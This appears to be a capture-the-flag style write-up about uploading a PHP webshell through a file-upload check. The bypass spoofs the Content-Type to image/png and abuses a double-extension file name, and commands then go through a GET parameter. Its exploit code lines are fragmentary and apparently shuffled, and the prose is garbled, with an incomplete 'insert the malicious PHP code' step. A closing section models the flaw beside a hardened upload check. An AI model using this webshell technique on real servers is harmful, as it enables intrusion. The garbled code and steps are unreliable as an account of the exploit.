I used a tool called winPEAS; this tool scans the machine looking for vulnerable processes and unprotected files. Getting user access was easy, now I needed root. To privilege escalate I tried a lot of things but none of them worked; I'm only going to share what worked.

After downloading the script and importing all the necessary libraries for python2.7 I ran the exploit and got user shell.

```python
R1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
print formatHelp("( ) Example:\t python %s ''" % sys.argv)
print formatHelp("( ) Usage:\t python %s " % sys.argv)
return Style.BRIGHT + Fore.RED + STRING + Fore.RESET
R2 = requests.get(WEB_SHELL, params=command, verify=False)
Term = Style.BRIGHT + Fore.GREEN + cwd + Fore.RESET
print(Fore.GREEN + ' ' + Fore.RESET + 'Successfully connected to webshell.')
print Style.BRIGHT + Fore.RED + " " + Fore.RESET + "Could not connect to the webshell." + Style.RESET_ALL
R2 = session.get(WEB_SHELL, params=getdir, verify=False)
WEB_SHELL = SERVER_URL + 'upload/kamehameha.php'
```

Communicate with the webshell at '/upload.php?id=kamehameha' using GET requests with the telepathy parameter. Therefore $conv='kaio-ken' $conv='php' $conv='png'. The web application will rename the file to have the extension with the second item in an array created from the file name separated by the '.' character. In the body of the 'file' parameter of the POST request, insert the malicious PHP code: Bypass the file type check by modifying the 'Content-Type' of the 'file' parameter to 'image/png' in the POST request, and set the 'pupload' parameter to 'upload'.
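The upload flaw described above, modelled next to a hardened check, as an added example that is not part of the original post or the exploit script. The function names, the allowlist and the sample inputs are assumptions constructed for illustration; the application itself is PHP, and this Python model only mirrors the two behaviours the post describes (trusting the client Content-Type, and naming the file from the second dot-separated item).

```python
import os
import uuid

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"   # first 8 bytes of every real PNG file
ALLOWED_EXT = {"png"}               # assumed allowlist for this example

# Constructed sample inputs (not captured traffic).
SAMPLE_NAME = "kaio-ken.php.png"
SAMPLE_BODY = b"<?php /* placeholder body */ ?>"
SAMPLE_PNG = PNG_MAGIC + b"\x00" * 8


def flawed_stored_name(upload_id, filename, content_type):
    """Model of the flaw: the client-supplied Content-Type is trusted and the
    stored extension is the SECOND dot-separated item of the file name."""
    if content_type != "image/png":
        return None
    parts = filename.split(".")
    if len(parts) < 2:
        return None
    return "%s.%s" % (upload_id, parts[1])


def hardened_stored_name(filename, body):
    """Hardened decision: ignore client metadata, judge the final extension
    and the content itself, and generate the stored name on the server."""
    base = os.path.basename(filename)
    if base.count(".") != 1:              # reject double extensions outright
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    if not body.startswith(PNG_MAGIC):    # content must look like a PNG
        return None
    # A random server-side name means the client controls neither the
    # extension nor the path. Magic bytes alone do not stop polyglot files,
    # so the upload directory should also be served with script execution off.
    return "%s.%s" % (uuid.uuid4().hex, ext)


if __name__ == "__main__":
    print(flawed_stored_name("kamehameha", SAMPLE_NAME, "image/png"))
    print(hardened_stored_name(SAMPLE_NAME, SAMPLE_BODY))
    print(hardened_stored_name("photo.png", SAMPLE_PNG))
```
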